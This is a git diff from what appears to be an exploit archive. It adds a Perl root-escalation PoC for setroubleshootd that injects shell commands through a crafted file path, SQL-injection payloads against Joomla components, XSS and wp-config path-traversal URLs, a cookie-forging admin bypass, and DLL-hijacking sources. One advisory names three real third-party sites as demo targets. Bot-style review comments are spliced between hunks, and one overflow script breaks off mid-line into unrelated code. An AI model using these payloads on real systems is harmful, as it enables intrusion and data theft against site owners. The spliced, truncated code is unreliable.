@@ -0,0 +1,109 @@ +setroubleshoot tries to find out which rpm a particular +file belongs to when it finds SELinux access violation reports. +The idea is probably to have convenient reports for the admin +which type enforcement rules have to be relaxed. setroubleshoot +runs as root (although in its own domain). In util.py +we have: + + +266 def get_rpm_nvr_by_file_path_temporary(name): +267 if name is None or not os.path.exists(name): +268 return None +269 +270 nvr = None +271 try: +272 import commands +273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name) +274 if rc == 0: +275 nvr = output +276 except: +277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name) +278 return nvr + +(and other similar occurences) + +So. Yes, thats correct: The SELinux system that is only there to protect you, +passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html) +inside a daemon running as root. Sacken lassen... + +I attached a PoC which uses networkmanager's openvpn plugin to execute +arbitraty commands by triggering an access violation to a pathname +which contains shell commands. + +The setroubleshootd_t domain has quite a lot of allowed rules and transitions, +so this can clearly count as privilege escalation. Furthermore a lot +of admins run their system in permissive mode (full root) even when +its shipped enforcing by default. + +Also note that there are potentially remote vectors, if attackers +can control part of the filenames being created (web uploads, git, scp, ftp etc). + +Sebastian + + +PS: I am all for SELinux but theres something on the wrong way. I counted +the LOC, and the core SELinux (kernel) has a smaller codebase than whats +framed around in python, running as root and mangling attacker controlled input. +IOW, the system that wants to protect you has fewer code enforcing the rules +than code that potentially blows up your system. 
And that code is python, +so let alone all the python modules and interpreter hat can have bugs on its own. +Driving such a lane _can only lead to abyss_. And I am not saying that evil +powers are creating an overly complex system to better hide their bugdoors +within. + +PPS: bug-logo will follow :) + +-- + +~ perl self.pl +~ $_='print"\$_=\47$_\47;eval"';eval +~ krahmer () suse de - SuSE Security Team + + +#!/usr/bin/perl + +# +# Fedora21 setroubleshootd local root PoC +# +# (C) 2015 Sebastian Krahmer +# +# - requires polkit authorization to add/mod VPN connections +# to NetworkManager (default on desktop user) +# - after execution of this script, which adds appropriate +# NM connection entries, try +# +# $ nmcli c up vpn-FOOBAR +# +# a couple of times, until you see: +# +# logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:... +# +# in the journalctl logs +# +# PS: I know in advance what the SELinux developers will say... :p +# +# I say: lulz! + + + +# create a pathname that setroubleshootd will eventually +# query sh -c { rpm -qf ... with, fucking up ' escaping. So the +# embedded pathname is then evaluated as command +# +# There goes your NSA-grade SELinux security!!! + +$file = "/tmp/foo.pem';`id|logger`;echo '"; +open(O, ">", $file) or die $!; +close O; + +# add connection +system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn"); +open(O,"|nmcli c edit vpn-FOOBAR") or die $!; + +print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote = +1.2.3.4, username = FOOBAR\n"; +print O "set vpn.secrets password=1\nsave\nquit\n"; +close(O); + + +print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n"; \ No newline at end of file diff --git a/platforms/php/webapps/36549.txt b/platforms/php/webapps/36549.txt new file mode 100755 index 000000000..128ed8e4b --- /dev/null +++ b/platforms/php/webapps/36549.txt 
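Review bot: The advisory quotes the bug, `commands.getstatusoutput("rpm -qf '%s'" % name)`, but never spells out the fix: the single quotes are defeated by a `'` in the path (exactly what the PoC's `/tmp/foo.pem` filename does by embedding `';` followed by a backtick-quoted `id|logger`), so the call should avoid the shell entirely, `subprocess.check_output(['rpm', '-qf', name])`, and the bare `except:` that follows should be narrowed so real failures are not swallowed. A reproduction caveat worth stating near the Perl script: the path must exist because of the `os.path.exists(name)` guard, which is why the file is created before the NetworkManager connection is added, and the AVC must actually reach setroubleshootd, which the advisory says still happens in permissive mode. In the listing the `print O` line appears broken at `remote = +1.2.3.4`; if that `+` is a diff marker rather than literal text, the string carries an embedded newline that cuts the `set vpn.data` command short, so confirm against the original file before running it.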
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51411/info
+
+The HD Video Share ('com_contushdvideoshare') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+HD Video Share 1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14
+http://www.example.com/index.php?option=com_contushdvideoshare&view=player&id=14â??a
\ No newline at end of file
diff --git a/platforms/php/webapps/36550.txt b/platforms/php/webapps/36550.txt
new file mode 100755
index 000000000..b81f76601
--- /dev/null
+++ b/platforms/php/webapps/36550.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51416/info
+
+PHP Membership Site Manager Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PHP Membership Site Manager Script version 2.1 and prior are vulnerable.
+
+http://www.example.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36551.txt b/platforms/php/webapps/36551.txt
new file mode 100755
index 000000000..106896593
--- /dev/null
+++ b/platforms/php/webapps/36551.txt
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51418/info + +PHP Ringtone Website is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36552.txt b/platforms/php/webapps/36552.txt new file mode 100755 index 000000000..283037c8d --- /dev/null +++ b/platforms/php/webapps/36552.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51422/info + +BoltWire is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +BoltWire 3.4.16 is vulnerable; other versions may also be affected. + +http://www.example.com/bolt/field/index.php?p=main&help='" +http://www.example.com/bolt/field/index.php?" + + + | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address] + | [+] + | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php + |-------------------------------------------------------------------------| + |*||*||*||*||*||*||*||*||*||*||*||*||* \ No newline at end of file diff --git a/platforms/php/webapps/36560.txt b/platforms/php/webapps/36560.txt new file mode 100755 index 000000000..805343b49 --- /dev/null 
+++ b/platforms/php/webapps/36560.txt @@ -0,0 +1,35 @@ +###################################################################### +# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability +# Google Dork: inurl:option=com_gallery_wd +# Date: 29.03.2015 +# Exploit Author: CrashBandicot (@DosPerl) +# Vendor HomePage: http://web-dorado.com/ +# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd +# Tested on: Windows +###################################################################### + +parameter 'theme_id' in GET vulnerable + +# Example : +# Parameter: theme_id (GET) +# Type: error-based +# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + +# ==================================================================================== # + +parameter 'image_id' in POST vulnerable + +# Example : +# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 +# Parameter: image_id (POST) +# Type: error-based +# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search + + +# ~ Demo ~ # $> + +http://www.cnct.tg/ +http://www.nswiop.nsw.edu.au/ +http://cnmect.licee.edu.ro/ + +#EOF \ No newline at end of file diff --git a/platforms/php/webapps/36561.txt b/platforms/php/webapps/36561.txt new file mode 100755 index 000000000..345043f59 --- /dev/null +++ b/platforms/php/webapps/36561.txt 
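Review bot: The `# ~ Demo ~ #` section at the end of this file lists three third-party live hosts, whereas every other advisory added in this commit uses `www.example.com` or `[path]` placeholders for its example URLs; those host lines should be replaced by a placeholder such as `http://www.example.com/` before the file is archived. The same advisory text (header block, both parameters, both payloads) is added again as platforms/php/webapps/36563.txt further down in this commit, identical apart from the missing demo section, so one of the two files is redundant and only one should be kept.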
@@ -0,0 +1,13 @@
+[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
+[+]Author: TUNISIAN CYBER
+[+]Date: 29/03/2015
+[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
+[+]Type:WebApp
+[+]Risk:High
+[+]Overview:
+Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability.
+
+[+]Proof Of Concept:
+
+127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
+
\ No newline at end of file
diff --git a/platforms/php/webapps/36563.txt b/platforms/php/webapps/36563.txt
new file mode 100755
index 000000000..cdf092f06
--- /dev/null
+++ b/platforms/php/webapps/36563.txt
@@ -0,0 +1,28 @@ +###################################################################### +# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability +# Google Dork: inurl:option=com_gallery_wd +# Date: 29.03.2015 +# Exploit Author: CrashBandicot (@DosPerl) +# Vendor HomePage: http://web-dorado.com/ +# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd +# Tested on: Windows +###################################################################### + +parameter 'theme_id' in GET vulnerable + +# Example : +# Parameter: theme_id (GET) +# Type: error-based +# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + +# ==================================================================================== # + +parameter 'image_id' in POST vulnerable + +# Example : +# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2 +# Parameter: image_id (POST) +# Type: error-based +# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search + +#EOF \ No newline at end of file diff --git a/platforms/php/webapps/36565.txt b/platforms/php/webapps/36565.txt new file mode 100755 index 000000000..b380c9db8 --- /dev/null +++ b/platforms/php/webapps/36565.txt 
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/51423/info
+
+ATutor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+ATutor 2.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ATutor/themes/default/tile_search/index.tmpl.php/"
+http://www.example.com/ATutor/login.php/index.php" /index.php
+http://www.example.com/ATutor/search.php/index.php" /index.php
+http://www.example.com/ATutor/password_reminder.php" /index.php
+http://www.example.com/ATutor/login.php/jscripts/infusion/" /index.php
+http://www.example.com/ATutor/login.php/mods/_standard/flowplayer/" /index.php
+http://www.example.com/ATutor/browse.php/jscripts/infusion/framework/fss/" /index.php
+http://www.example.com/ATutor/registration.php/themes/default/ie_styles.css" /index.php
+http://www.example.com/ATutor/about.php/" /index.php
+http://www.example.com/ATutor/themes/default/social/basic_profile.tmpl.php/" /index.php
diff --git a/platforms/php/webapps/36566.txt b/platforms/php/webapps/36566.txt
new file mode 100755
index 000000000..a571b88fa
--- /dev/null
+++ b/platforms/php/webapps/36566.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/51424/info
+
+Beehive Forum 101 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/forum/register.php?'[xss]
+http://www.example.com/forum/register.php/''[xss]
+http://www.example.com/forum/logon.php?'"'[xss]
+http://www.example.com/forum/logon.php/'"'[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/36567.txt b/platforms/php/webapps/36567.txt
new file mode 100755
index 000000000..b87f5df88
--- /dev/null
+++ b/platforms/php/webapps/36567.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/51428/info
+
+phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/phpvideopro-0.9.7/help/index.php?topic='"
+http://www.example.com/phpvideopro-0.9.7/login/"><"
+http://www.example.com/phpvideopro-0.9.7/configure.php/"><"
+http://www.example.com/phpvideopro-0.9.7/medialist.php/"><"
+http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><"
+http://www.example.com/phpvideopro-0.9.7/search.php/"><"
+http://www.example.com/phpvideopro-0.9.7/listgen.php/"><"
+http://www.example.com/phpvideopro-0.9.7/label.php/"><"
\ No newline at end of file
diff --git a/platforms/php/webapps/36568.txt b/platforms/php/webapps/36568.txt
new file mode 100755
index 000000000..ca581032a
--- /dev/null
+++ b/platforms/php/webapps/36568.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51431/info
+
+Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Giveaway Manager 3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/members.php?id=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/36569.txt b/platforms/php/webapps/36569.txt
new file mode 100755
index 000000000..f4526288f
--- /dev/null
+++ b/platforms/php/webapps/36569.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/51434/info
+
+Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/3745.txt b/platforms/php/webapps/3745.txt
index 5ec1b3840..c935f1a7c 100755
--- a/platforms/php/webapps/3745.txt
+++ b/platforms/php/webapps/3745.txt
@@ -1,11 +1,11 @@
-# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
-# D.Script: http://sourceforge.net/projects/webslider/
-# Discovered by: GolD_M = [Mahmood_ali]
-# Homepage: http://Www.Tryag.Com/cc
-# Exploit:[Path]/index.php?path=Shell
-# Exploit:[Path]/modules/pdf.php?path=Shell
-# Exploit:[Path]/plugins/highlight.php?path=Shell
-# Exploit:[Path]/include/modules.php?path=Shell
-# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb
-
-# milw0rm.com [2007-04-15]
+# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
+# D.Script: http://sourceforge.net/projects/webslider/
+# Discovered by: GolD_M = [Mahmood_ali]
+# Homepage: http://Www.Tryag.Com/cc
+# Exploit:[Path]/index.php?path=Shell
+# Exploit:[Path]/modules/pdf.php?path=Shell
+# Exploit:[Path]/plugins/highlight.php?path=Shell
+# Exploit:[Path]/include/modules.php?path=Shell
+# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb
+
+# milw0rm.com [2007-04-15]
diff --git a/platforms/php/webapps/5629.txt b/platforms/php/webapps/5629.txt
index faffb515e..f619de03c 100755
--- a/platforms/php/webapps/5629.txt
+++ b/platforms/php/webapps/5629.txt
@@ -1,58 +1,58 @@ ---==+================================================================================+==-- ---==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- ---==+================================================================================+==-- - - - -Discovered By: t0pP8uZz -Discovered On: 15 MAY 2008 -Script Download: http://sourceforge.net/projects/webslider/ -DORK: N/A - - - -Vendor Has Not Been Notified! - - - -DESCRIPTION: - -Web Slider 1.6 (and prior), suffers from insecure cookie handling, when a admin logs in successfully a -cookie is created so admin doesnt have to login everypage, the bad thing is the coding is poor and the script -only checks to see if the cookie exists, it doesnt contain any password or anything. - -so all we need to do is create a cookie so it makes us look like admin, the below javascript will do just that. - - - -Exploit: - -javascript:document.cookie = "admin=1; path=/"; - - - -NOTE/TIP: - -after pasting the above javascript code in your browser on a affected domain, you will be able to goto -"/admin.php" and access it as if you were a admin. - -this should come to your attention how many web-developers are very bad coders. and leave massive -easy-to-fix holes like this in there scripts. - -just remember when downloading a file of any kind to read through its source, and make sure its secure - - - -GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! 
- - - -peace, t0pP8uZz - - - ---==+================================================================================+==-- ---==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-05-15] +--==+================================================================================+==-- +--==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- +--==+================================================================================+==-- + + + +Discovered By: t0pP8uZz +Discovered On: 15 MAY 2008 +Script Download: http://sourceforge.net/projects/webslider/ +DORK: N/A + + + +Vendor Has Not Been Notified! + + + +DESCRIPTION: + +Web Slider 1.6 (and prior), suffers from insecure cookie handling, when a admin logs in successfully a +cookie is created so admin doesnt have to login everypage, the bad thing is the coding is poor and the script +only checks to see if the cookie exists, it doesnt contain any password or anything. + +so all we need to do is create a cookie so it makes us look like admin, the below javascript will do just that. + + + +Exploit: + +javascript:document.cookie = "admin=1; path=/"; + + + +NOTE/TIP: + +after pasting the above javascript code in your browser on a affected domain, you will be able to goto +"/admin.php" and access it as if you were a admin. + +this should come to your attention how many web-developers are very bad coders. and leave massive +easy-to-fix holes like this in there scripts. + +just remember when downloading a file of any kind to read through its source, and make sure its secure + + + +GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! 
+ + + +peace, t0pP8uZz + + + +--==+================================================================================+==-- +--==+ Web Slider <= 0.6 Insecure Cookie/Authentication Handling +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-05-15] diff --git a/platforms/windows/local/36533.py b/platforms/windows/local/36533.py new file mode 100755 index 000000000..e1b472b0c --- /dev/null +++ b/platforms/windows/local/36533.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python +#[+] Author: TUNISIAN CYBER +#[+] Exploit Title: IDM v6.20 Local Buffer Overflow +#[+] Date: 27-03-2015 +#[+] Type: Local Exploits +#[+] Tested on: WinXp/Windows 7 Pro +#[+] Vendor: https://www.internetdownloadmanager.com/ +#[+] Friendly Sites: sec4ever.com +#[+] Twitter: @TCYB3R +#[+] Poc:http://i.imgur.com/7et4xSh.png +#[+] Create IDMLBOF.txt then open , copy the content then go to Options-VPN/Dial Up and paste it in the username field. + + +from struct import pack +file="IDMLBOF.txt" +junk="\x41"*2313 +eip = pack(' + +int tunisian() +{ +WinExec("calc", 0); +exit(0); +return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) +{ +tunisian(); +return 0; +} \ No newline at end of file diff --git a/platforms/windows/local/36556.c b/platforms/windows/local/36556.c new file mode 100755 index 000000000..ccc615e4d --- /dev/null +++ b/platforms/windows/local/36556.c 
@@ -0,0 +1,29 @@
+/*
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking
+#[+] Date: 29-03-2015
+#[+] Type: Local Exploits
+#[+] Vendor: http://www.recoverlostpassword.com/products/zippasswordrecovery.html#compare
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] gcc -shared -o dwmapi.dll tcyber.c
+# Copy it to the software dir. then execute the software , calc.exe will launch :).
+Proof of Concept (PoC):
+=======================
+*/
+
+#include
+
+int tunisian()
+{
+WinExec("calc", 0);
+exit(0);
+return 0;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
+{
+tunisian();
+return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/local/36557.txt b/platforms/windows/local/36557.txt
new file mode 100755
index 000000000..aa3c7b720
--- /dev/null
+++ b/platforms/windows/local/36557.txt
@@ -0,0 +1,20 @@
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking
+#[+] Date: 28-03-2015
+#[+] Type: Local Exploits
+#[+] Vendor: https://httrack.com/page/2/fr/index.html
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that
+# the 2 files are in the same dir.
+#include
+#define DllExport __declspec (dllexport)
+DllExport void hook_startup() { exp(); }
+
+int exp()
+{
+ WinExec("calc", 0);
+ exit(0);
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/local/36558.txt b/platforms/windows/local/36558.txt
new file mode 100755
index 000000000..e9cae7ee2
--- /dev/null
+++ b/platforms/windows/local/36558.txt
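Review bot: `tunisian()` is invoked from `DllMain` and calls `exit(0)` while the loader lock is held; process creation and termination from inside `DllMain` are among the things Microsoft's DLL best-practices guidance says not to do there (deadlocks and detach handlers running in an inconsistent state), and the `return 0;` that follows `exit(0)` is unreachable. The `#include` line on this page has lost its header name, presumably `<windows.h>` stripped by the HTML rendering, and `exit` additionally needs `<stdlib.h>`, which the Windows header does not promise to pull in; `DllMain` also ignores all three of its parameters, so the body runs for every `fdwReason`, not only process attach. A comment above `DllMain` stating which header the build expects would let a reader compile the listing as archived.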
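Review bot: In 36557.txt, `hook_startup` calls `exp()` one line before `exp` is defined and with no prior prototype, so the call relies on an implicit function declaration that C99 removed and that current compilers reject by default; the identical code is added in platforms/windows/local/36558.txt. `exp` is also the name of the `<math.h>` function, and C reserves every standard-library function name as an identifier with external linkage, so `int exp()` is undefined behaviour whether or not `<math.h>` is included — the helper needs a non-reserved name and a forward declaration placed before `hook_startup`. As in 36556.c, the `#include` line has lost its header name in this rendering (presumably `<windows.h>` for `WinExec`) and `exit` requires `<stdlib.h>`, which should be stated in the file's header comment so the listing can be rebuilt from the archive.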
@@ -0,0 +1,20 @@
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking
+#[+] Date: 28-03-2015
+#[+] Type: Local Exploits
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Friendly Sites: sec4ever.com
+#[+] Twitter: @TCYB3R
+#[+] Poc:http://i.imgur.com/naHAdJF.png
+#[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that
+# the 2 files are in the same dir.
+#include
+#define DllExport __declspec (dllexport)
+DllExport void hook_startup() { exp(); }
+
+int exp()
+{
+ WinExec("calc", 0);
+ exit(0);
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/36542.txt b/platforms/windows/remote/36542.txt
new file mode 100755
index 000000000..cc5efb725
--- /dev/null
+++ b/platforms/windows/remote/36542.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51367/info
+
+ExpressView Browser Plug-in is prone to multiple integer overflow and remote code-execution vulnerabilities.
+
+Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable.
+
+http://www.exploit-db.com/sploits/36542.zip
\ No newline at end of file
diff --git a/platforms/windows/remote/36546.txt b/platforms/windows/remote/36546.txt
new file mode 100755
index 000000000..a4ecc63fd
--- /dev/null
+++ b/platforms/windows/remote/36546.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/51393/info
+
+GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability.
+
+Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.
+
+GreenBrowser 6.0.1002 and prior versions are vulnerable.
+
+http://www.exploit-db.com/sploits/36546.rar
\ No newline at end of file